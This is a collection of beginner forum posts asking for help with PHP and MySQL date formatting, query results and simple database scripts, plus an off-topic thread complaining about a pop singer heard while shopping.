thanks for the quick reply, i've read the manual but i'm a little confused
when using the php $date=mysql_fetch_object(mysql_query("SELECT DATE_FORMAT(`date`,'%W %M %Y') FROM `updates` WHERE id='1'"));
then echo $date it doesn't work
please help.

hmmm but what if i already have it saved in the database? like 2011-05-06 22:11:57 and i want to only echo the month or date? what that code above work?

hi, there.
I have a timestamp in my mysql database called timestamp and it'll record the current timestamp. however it also records the time etc how do i use php to take apart these for example if i wanted to echo the date and time in a different order or if i only wanted to echo the date not the time.
how is this possible?

Hi i have the following code
$orderFetch->order="3"; mysql_query("UPDATE `categories` SET order=order-1 WHERE `order` > $orderFetch->order");i wish to minus -1 from all the "order" fields in categories that are over a certain value i.e 3. But however this code is not working can anyone tell me where i'm going wrong?

Ok so i'm a newbie, and i in need of scripts that is possible free easy to install or to add to a sever. It needs to allow me to upload multiple files set the locations of the files in the script and it also need to be able to make decent thumbnails on each uploaded image.
All setting need to be easy to change and the files needs to be clean and easily understandable for a newbie does anyone have any sugesstions??

Ok sorry if this is a proper newbie question but say i have a timestamp saved in a database in a table called "news" and the field is called "date" how do i get the month and year only from example if the time stamp is 2011-03-29 13:57:05.
And i want to list all news articles from the month 03 and the year 2011 how would i go about doing this?

however i get a return of Resource id #13.

In my mysql database i have a field that records peoples details one part of the details is their county/region they live in. It records the county in a normal varchar field however i need a simple php script that searching the database and finds the most common county so i can then return to the screen where the most popular region for my members.

I've never heard of him, but who forces you to listen to his music anyway? If he is popular, then obviously someone likes him. Each to his/her own. Why do you even care about what kind of music other people like listening to?
I'm with Daniel0. I have no idea who he is, but if he sounds bad, turn it off! Isn't that common sense? If I don't like the song I listen to, whether it be on the radio or someone else's media player, I change it. Simple as that. Since you hate him enough to actually create a topic to complain about him, you obviously either were forced to listen to him against your will or you just want to listen to him or watch his videos so you can read comments about why other people like him so much. Either way, I doubt many here would care about your obsessions.
I am forced to listen to him!!! When i'm doing my shopping and i've just spent 30 mins filling up my trolley am not going to leave the trolley and stand outside untill the song is finished or put my fingers in my ears in the middle of the store until the song is finished because either way i look like a twat LOL
